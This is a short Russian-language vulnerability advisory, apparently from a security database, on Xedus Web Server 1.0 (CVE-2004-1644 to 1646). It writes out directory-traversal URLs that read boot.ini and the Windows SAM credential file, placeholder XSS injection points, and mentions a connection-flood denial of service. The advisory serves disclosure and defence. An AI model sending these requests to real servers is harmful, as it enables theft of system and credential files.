Несколько уязвимостей в Xedus web server

Дата публикации:
31.08.2004
Всего просмотров:
976
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2004-1644
CVE-2004-1645
CVE-2004-1646
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Отказ в обслуживании
Раскрытие важных данных
Раскрытие системных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Xedus Web Server 1.x
Уязвимые версии: Xedus Web Server 1.0

Описание: Несколько уязвимостей обнаружено в Xedus web server. Удаленный пользователь может просматривать произвольные файлы на системе. Удаленный пользователь может вызвать отказ в обслуживании. Удаленный пользователь может выполнить XSS нападение.

1. Просмотр произвольных файлов:

http://[target]:4274/../data/log.txt
http://[target]:4274/../../../../../boot.ini
http://[target]:4274/../../../../../WINNT/repair/sam
2. XSS:
http://[target]:4274/test.x?username=[XSS]
http://[target]:4274/TestServer.x? username=[XSS]
http://[target]:4274/testgetrequest.x?param=[XSS]
Также удаленный пользователь может установить множественные подключения к серверу, чтобы аварийно завершить его работу.

URL производителя: http://www.thinxoft.com/downloads/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple Vulnerabilities In Xedus Webserver

или введите имя

CAPTCHA